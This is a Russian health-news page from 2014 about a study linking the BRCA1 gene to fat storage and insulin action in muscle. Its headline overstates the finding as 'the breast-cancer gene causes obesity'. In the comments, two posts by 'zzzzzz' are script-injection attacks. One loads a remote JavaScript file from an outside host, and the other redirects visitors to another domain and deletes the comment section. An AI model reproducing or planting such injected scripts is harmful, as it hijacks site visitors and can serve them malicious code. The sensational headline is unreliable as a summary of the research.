Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если рак груди вас не пуг...  >>  Если рак груди вас не пугает, то уж лишний вес должен! Ген рака груди вызывает ожирение. Сдайте анализ прямо сейчас!
 
Обратная связь
 

Если рак груди вас не пугает, то уж лишний вес должен! Ген рака груди вызывает ожирение. Сдайте анализ прямо сейчас!

Размер шрифта
24 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Генетика не стоит на месте, и теперь мы знаем, что некоторые гены связаны с развитием рака – поэтому генетические тесты становятся все более популярными. Однако кое-что можно сказать уже по внешнему виду человека. Оказывается, ген, связанный с раком груди, помимо прочего является причиной ожирения.

Если рак груди вас не пугает, то уж лишний вес должен! Ген рака груди вызывает ожирение. Сдайте анализ прямо сейчас!

Ген BRCA1 ответственен за предрасположенность к возникновению рака груди. Однако оказалось, что он также играет важную роль в регуляции метаболизма скелетных мышц. К такому выводу пришли ученые из Школы общественного здоровья Университета Мэрилэнда. Профессор Эспен Шпангенбург с коллегами впервые показали, что белок – продукт этого гена, вырабатывается в скелетных мышцах мыши и человека. Этот белок связан с накоплением жира, действием инсулина и процессами производства энергии в клетках мышечной ткани. Исследование было опубликовано в Journal of Lipid Research.

«Полученные нами результаты говорят о том, что мутации в гене BRCA1 могут повышать риск развития нарушений метаболизма, таких как ожирение и диабет второго типа», – рассказывает доктор Шпангенбург. «Без BRCA1 клетки мышц накапливают избыток жира. Мы считаем, что значение этого гена для организма человека выходит далеко за рамки одного только влияния на рак груди».

Ученые обнаружили, что белок – продукт гена BRCA1, связывается с другим белком, который играет важную роль в обмене жиров в мышечных клетках. Этот белок называется Ацетил-КоА карбоксилаза или, сокращенно, ACC. После физических упражнений белок BRCA1 связывается с ACC, что ведет к «выключению» последнего. Это в свою очередь приводит к более активному разрушению жирных кислот клетками мышц. Чтобы подтвердить роль BRCA1 в этом процессе, ученые «выключили» сам ген в культуре клеток мышечной ткани, взятых из организма здоровых, активных и стройных женщин.В результате этого эксперимента мышечные клетки стали выглядеть больными. При полном «выключении» гена BRCA1, как и при мутации в этом гене, наблюдается увеличение запасания жиров, снижение действия инсулина и энергетической функции клеток. Все это ведет к развитию нарушений обмена веществ и связанных с этим заболеваний, таких как ожирение, диабет второго типа и сердечно-сосудистые заболевания.

«Наша работа доказала, что нормальная работа гена BRCA1 препятствует развитию нарушений метаболизма», – отмечает доктор Шпангенбург. «Присутствие этого гена в организме очень важно, к тому же он может стать ключом к разработке новых методов лечения диабета и ожирения».

Что ж, еще одна причина внимательно следить за своим весом и не бояться обратиться к профессионалу, который поможет справиться с этой проблемой.

Другие материалы о женском здоровье ищите на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как Анджелина Джоли изменила наш мир?   Может ли морковка в день избавить вас от рака груди?   Как самой обследовать грудь   Что нужно женщинам?! Начинается на букву Д!  
23 июля 2013Из лысых крыс сделают лекарство от рака 26 июня 2013Что пить, чтобы не было рака груди?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Ответы на все вопросы о раке груди
Тесты для вашей любимой груди
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.